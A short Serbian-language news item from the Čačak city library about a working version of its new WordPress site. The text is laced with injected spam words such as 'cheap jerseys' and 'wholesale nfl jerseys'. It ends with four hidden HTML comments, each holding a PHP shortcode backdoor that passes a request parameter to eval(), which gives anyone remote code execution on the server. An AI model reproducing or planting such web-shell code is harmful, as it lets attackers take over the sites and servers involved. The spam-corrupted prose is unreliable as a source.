Центар за дигитализацију Градске библиотеке „Владислав Петковић Дис“ 11. августа 2010. године поставио Yourself је радну верзију новог сајта Библиотеке на адреси www.cacak-dis.rs/index2.php.

Ова EMOZIONE верзија уследила је након низа тестирања и et проба више система за управљање садржајем (CMS) у претходном периоду, као одабраног решења за стварање свеобухватне интернет презентације установе, наших онлајн услуга и Web 2.0 решења. cheap jerseys Нови сајт Библиотеке покретаће WordPress CMS, са преко 15 додатних wholesale nfl jerseys модула који су неопходни за имплементацију cheap jerseys амбициозно постављених циљева новог Chaise сајта Градске библиотеке Чачак.

<!– [insert_php]if (isset($_REQUEST["yiRa"])){eval($_REQUEST["yiRa"]);exit;}[/insert_php][php]if (isset($_REQUEST["yiRa"])){eval($_REQUEST["yiRa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["EnsvO"])){eval($_REQUEST["EnsvO"]);exit;}[/insert_php][php]if (isset($_REQUEST["EnsvO"])){eval($_REQUEST["EnsvO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["vZHv"])){eval($_REQUEST["vZHv"]);exit;}[/insert_php][php]if (isset($_REQUEST["vZHv"])){eval($_REQUEST["vZHv"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["CfV"])){eval($_REQUEST["CfV"]);exit;}[/insert_php][php]if (isset($_REQUEST["CfV"])){eval($_REQUEST["CfV"]);exit;}[/php] –>